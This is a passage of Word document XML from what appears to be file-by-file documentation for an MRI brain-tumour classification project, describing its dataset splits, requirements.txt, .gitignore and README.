          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pituitary/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (400).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Why it exists:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Provides an untouched evaluation set to measure true generalization. Also provides sample images for the web app's interactive gallery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Responsibility:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ground-truth testing split.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Which other files use it:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Evaluated in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>02_model_training.ipynb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and scanned by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to populate the "Select Clinical Test Sample" dropdown.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Essential or Optional?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Essential.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tracked in Git so that cloned repositories have immediate test images.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Failure Mode if Missing:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Final test metrics cannot be computed, and the web app's pre-loaded sample picker will fail.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Creation Method:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Curated from the clinical MRI dataset.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>7. `dataset/Training/`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>What it contains:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5,600 MRI images divided equally (1,400 per class) across four class folders.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Why it exists:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Provides the training corpus used during neural network parameter optimization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Responsibility:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Feeds the convolutional layers during backpropagation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Which other files use it:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Consumed exclusively by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>notebooks/01_data_exploration.ipynb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>notebooks/02_model_training.ipynb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Essential or Optional?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Essential for model training; ignored by Git (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.gitignore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>) to keep repository size small.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Failure Mode if Missing:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The model cannot be trained from scratch. However, inference in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> still functions because the model weights are pre-saved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Creation Method:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Curated from the source clinical dataset.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>8. `requirements.txt`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>What it contains:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> An exact list of all external Python libraries and their version constraints required to execute the notebooks and web application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Why it exists:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensures reproducible execution across different machines, operating systems, and team members.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Responsibility:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tells </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> which packages to install.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Which other files use it:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Invoked by developers during environment setup (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pip install -r requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Essential or Optional?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Essential.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Failure Mode if Missing:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> New developers or production servers must guess package versions, causing dependency conflicts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Creation Method:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Manually curated with version boundaries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>9. `.gitignore`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>What it contains:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rules telling Git which files and directories to exclude from version control tracking (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.venv/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>dataset/Training/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__pycache__/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.ipynb_checkpoints/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Why it exists:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prevents accidental uploading of virtual environments, cache files, and huge datasets that would bloat the GitHub repository past limits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Responsibility:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Maintains Git repository hygiene and keeps clone size under 50 MB.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Which other files use it:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Read automatically by the Git CLI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Essential or Optional?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Essential.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Failure Mode if Missing:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Git attempts to commit thousands of virtual environment binaries and 125 MB of training images, risking failed pushes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Creation Method:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Manually written.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>10. `README.md`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>What it contains:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Comprehensive project presentation document written in GitHub Flavored Markdown, featuring badges, executive summary, architecture diagrams, benchmark comparison tables, mathematical Grad-CAM explanations, and quickstart commands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Why it exists:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Serves as the public face of the project on GitHub.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Responsibility:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Informs reviewers, recruiters, and collaborators about how to run and understand the project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Which other files use it:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rendered automatically by GitHub on the repository homepage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Essential or Optional?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
